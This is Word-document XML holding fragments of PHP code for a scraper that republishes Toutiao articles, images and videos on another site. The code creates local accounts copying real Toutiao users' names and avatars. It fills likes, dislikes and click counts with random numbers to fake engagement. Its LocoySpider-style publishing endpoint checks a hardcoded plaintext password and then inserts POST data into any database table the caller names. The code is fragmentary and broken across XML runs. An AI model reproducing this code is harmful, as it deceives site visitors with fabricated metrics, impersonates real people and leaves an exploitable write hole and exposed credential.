    </w:p>
    <w:p w14:paraId="160C3D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if($v['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E918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$titles=Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F2A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if($titles){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAEC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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505E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3FC4A7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4F56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CBDDE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不存在标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10AD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49E0E4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BD4A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if($v['user_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE877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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34383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if(input('img')){$this-&gt;huochetou(input('img_data'));continue;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D21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004A9B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$userInfo=$this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492DC6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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C121B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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5F3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$userData['nickname']=$userInfo['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AA3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$userData['qianming']=!empty($userInfo['qianming']) ? $userInfo['qianming'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD76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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2932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3700F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$data['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D050D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5D52B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".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1E5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5E32D2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BB20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if($v['mychannel']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA0F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if(!$v['content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64ED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"content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE58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79B71C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0C50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$data['image']            =           $this-&gt;qiniu($v['img']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7EE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$this-&gt;_html_content($v['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6E9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if($v['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B593C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($v['images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19856A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$img[$k]['img']=$this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42AB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$img[$k]['img_text']=$v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB91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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6574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            =          $img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052DB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2593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A48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$data['images']=json_encode($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7473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if($v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CA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if(!$v['video_data'] || !$v['video_data']['video_url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10C2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视频模式视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA9E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3C9F5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53BF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$data['video']=$this-&gt;qiniu($v['video_data']['video_url'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E95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$data['image']=$this-&gt;qiniu($v['video_data']['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B32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D5536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$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69232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$data['source']             =           $v['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C97B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$v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D844B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$v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774C34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$data['update_time']        =           $v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418548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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D6C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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC8D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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B24A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$data['toutiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0A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if(!empty($v['tag'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DD1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$data['typeid']=$this-&gt;catename($v['tag']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EA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32110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$data['typeid']='news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469379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B5FE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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFED1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'id:'.$id.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB9FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C98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$this-&gt;toutiao_ping($id,$v['group_id'],$v['item_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F207C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51E1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3745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_html_content($article){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C39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preg_match_all("/src=\"(.*?)\"/", $article,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE985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5FBBAF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($img[1] as $k  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54E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$img_1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAE8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$img_2=$this-&gt;qiniu($img_1,'article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC86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if($img_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A890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$article=str_replace($img_1,$img_2,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C469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FF6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3547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902C0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$article=preg_replace("/(img_width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EB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$article=preg_replace("/(img_height.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE1B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$article=preg_replace("/(onerror.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EA7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$article=preg_replace("/(inline.*?)\"(.*?)\"/si","",$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4458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$article=preg_replace("/&lt;(p.*?)&gt;/si","&lt;p&gt;",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFD0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$article=preg_replace("/&lt;(\/?figure.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB55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$article=preg_replace("/&lt;(\/?a.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3894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$article=preg_replace("/(data.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA040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$article=preg_replace("/(width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD82A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$article=preg_replace("/(alt.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0FD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$article=preg_replace("/(style.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A372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$article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A40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F752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huochetou($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1703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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F79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input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE041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84435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'pwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7B7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5DAA50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字段必填，发布密码请在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>caiji.php</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件源码查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E3FC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50A2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'__name__';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276E9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16E429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字段必填，具体请看数据表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A5F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0E12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'title';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E32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6751F4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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2761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7CB16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'des';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523E6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6D4095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字段必填，排序（必填，默认</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C164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29EA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'uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A226F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660A39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字段必填，请在后台，用户管理查看用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314276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CA21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Db::name('member')-&gt;find($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E624A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0BC1E6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不存在，请在后台，用户管理查看用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C686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32C2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'mychannel';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CC6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5B3BBF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字段必填，频道模型，具体请看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表（必填）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CF0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1628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'hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A21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1DC29B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字段必填，隐藏状态，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必须）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD3F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0814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'create_time';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06E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16D746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$name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填，发布时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF12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56CE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'update_time';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E60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78D7E9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$name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填，修改时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E179B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BF5C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'image';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FA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&amp;&amp; $data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5393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$data[$name] = $this-&gt;qiniu($data[$name]); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EC6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E6D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if($data['mychannel'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F65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'content';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3E7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7F9DF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'mychannel=1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2F8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2806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 $this-&gt;_html_content($data['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689C0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if($data['mychannel'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB0CB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'images';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287E2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71FBA1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'mychannel=2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7903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81E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 = json_decode($data['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104D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($data['images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D01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$img[$k]['img']=$this-&gt;qiniu($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF284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$img[$k]['img_text']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBFEC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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD01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'image';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBDB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&amp;&amp; !$data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF6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  =   $img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABA1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6872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0903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DB2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$data['images']=json_encode($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D87D7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if($data['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F530C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$name = 'video';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302016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if(empty($data[$name]) || !$data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A17A4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'mychannel=3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58217B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7A1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$data['video']=$this-&gt;qiniu($data['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419805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00981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'mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误，范围</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-3';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C771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504A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if(!$data){exit('-1');}if(empty($data['pwd']) || $data['pwd'] != 'suxiang1424445608'){exit('-2');}else{unset($data['pwd']);$name=$data['__name__'];unset($data['__name__']);echo Db::name($name)-&gt;insertGetId($data);} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E30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A3A7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ceshi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358A1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38C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toutiao_ping($aid,$group_id='',$item_id=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8403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$count=rand(1,50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29742C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if(!$group_id || !$item_id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EED9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2C72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$url='toutiao/ping_3/group_id/'.$group_id.'/item_id/'.$item_id.'/count/'.$count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51290B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$html=$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1A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$i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FFA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15D903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$where['content']=$v['text'];           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416040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$where['zan']=rand(1,999);           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2497F3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$where['time']=$v['create_time'];       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7472BB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$where['aid']=$aid;                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708663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$where['zan']=rand(20,229);             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3BD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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CD2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4F97C2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$userInfo=$this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFED4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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2996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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BDB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$userData['nickname']=$userInfo['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68827F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7157AE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE94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1B6D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$where['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34EA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$a=Db::name('article_ping')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1597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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A50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39645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6FD6A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Db::name('article')-&gt;where('id',$aid)-&gt;update(['pingNum'=&gt;$i,'zan'=&gt;rand(0,300),'cai'=&gt;rand(0,50),'click'=&gt;rand(1,9999)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F155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5A5E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weitoutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D6D4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$this-&gt;weibo();return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3A3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54D171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$url="toutiao/weitoutiao";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0206D7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$html=$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76EB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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D7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7734D1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40511D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"&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2B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if(!empty($v['title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA7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$titles=Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47920C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if($titles){</w:t>
      </w:r>
    </w:p>
